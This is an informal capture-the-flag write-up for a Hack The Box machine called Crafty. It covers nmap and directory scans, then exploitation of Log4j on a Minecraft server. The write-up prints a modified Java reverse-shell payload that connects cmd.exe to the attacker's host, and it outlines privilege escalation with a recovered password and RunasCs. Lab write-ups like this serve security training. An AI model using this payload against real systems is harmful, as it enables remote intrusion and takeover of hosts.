Recon

Nmap Results

# Nmap 7.94 scan initiated Tue Feb 13 03:57:54 2024 as: nmap -p- --min-rate 5000 -sV -oN reports.nmap crafty.htb
Nmap scan report for crafty.htb (10.10.11.249)
Host is up (0.039s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE   VERSION
80/tcp    open  http      Microsoft IIS httpd 10.0
25565/tcp open  minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 1/100)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 13 03:58:27 2024 -- 1 IP address (1 host up) scanned in 33.27 seconds

Dirsearch Results

# Dirsearch started Tue Feb 13 03:38:21 2024 as: /usr/share/dirsearch/dirsearch.py -u http://crafty.htb

301   144B   http://crafty.htb/js    -> REDIRECTS TO: http://crafty.htb/js/
403   312B   http://crafty.htb/%2e%2e//google.com
403   312B   http://crafty.htb/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
403   312B   http://crafty.htb/\..\..\..\..\..\..\..\..\..\etc\passwd
403   312B   http://crafty.htb/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
301   145B   http://crafty.htb/css    -> REDIRECTS TO: http://crafty.htb/css/
301   145B   http://crafty.htb/img    -> REDIRECTS TO: http://crafty.htb/img/
301   145B   http://crafty.htb/index.html    -> REDIRECTS TO: http://crafty.htb/home
403     1KB  http://crafty.htb/js/

User Flag log4j exploit

So we know port 25565 open and it identify as Minecraft server version 1.16.5 that affected to vulnerability called "LOG4J" its exploit rce for java.

You can get the public exploit in : https://github.com/kozmer/log4j-shell-poc

Identify the exploit and edit it ( because the machine was windows and the exploit rce call /bin/sh instead cmd.exe so we must edit it )

in String cmd="/bin/sh" to "cmd.exe" like this:

def generate_payload(userip: str, lport: int) -> None:
    program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {

    public Exploit() throws Exception {
        String host="%s";
        int port=%d;
        String cmd="cmd.exe";
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port);
        InputStream pi=p.getInputStream(),
            pe=p.getErrorStream(),
            si=s.getInputStream();
        OutputStream po=p.getOutputStream(),so=s.getOutputStream();
        while(!s.isClosed()) {
            while(pi.available()>0)
                so.write(pi.read());
            while(pe.available()>0)
                so.write(pe.read());
            while(si.available()>0)
                po.write(si.read());
            so.flush();
            po.flush();
            Thread.sleep(50);
            try {
                p.exitValue();
                break;
            }
            catch (Exception e){
            }
        };
        p.destroy();

we got the flag ( in out netcat listener ), after that i escalate to using msfvenom and msfconsole to easier proccess.

Root flag Portfwd

Go to the plugins in server directory. get the java plugins
download it and decompile it using jd-gui

we got the pass. try it in administrator using https://github.com/antonioCoco/RunasCs/releases/tag/v1.5 or u can different method : https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/lateral-movement/runas

And boom we got the flag and root.

Pasted image 20240214185122.png